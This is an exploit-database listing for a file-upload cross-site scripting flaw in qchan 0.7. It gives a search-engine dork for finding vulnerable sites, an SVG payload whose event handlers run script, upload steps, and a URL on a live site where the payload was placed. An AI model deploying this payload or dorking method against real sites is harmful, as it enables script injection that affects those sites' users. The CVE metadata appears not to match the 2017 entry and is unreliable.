Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-39893 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-12-30 |
============================================================================ | # Title : qchan 0.7 File upload XSS Vulnerability | | # Author : indoushka | | # email : [email protected] | | # Tested on : windows 10 Franais V.(Pro) | | # Version : 0.7 | | # Vendor : http://wmscripti.com/ | | # Dork : Powered by Qchan 0.7 | ============================================================================ poc : [+] Dorking n Google Or Other Search Enggine [+] Save this code as test.svg : <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <defs> <circle id="indoushka" r="50" cx="100" cy="100" style="fill: #F00"> <set attributeName="fill" attributeType="CSS" onbegin='alert(1)' onend='alert(2)' to="#00F" begin="1s" dur="5s" /> </circle> </defs> <use xlink:href="#indoushka"/> </svg> [+] upload it . http://shandian.free.yuny.pw/uploads/2017/12/test.svg Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================
Copyright ©2024 Exploitalert.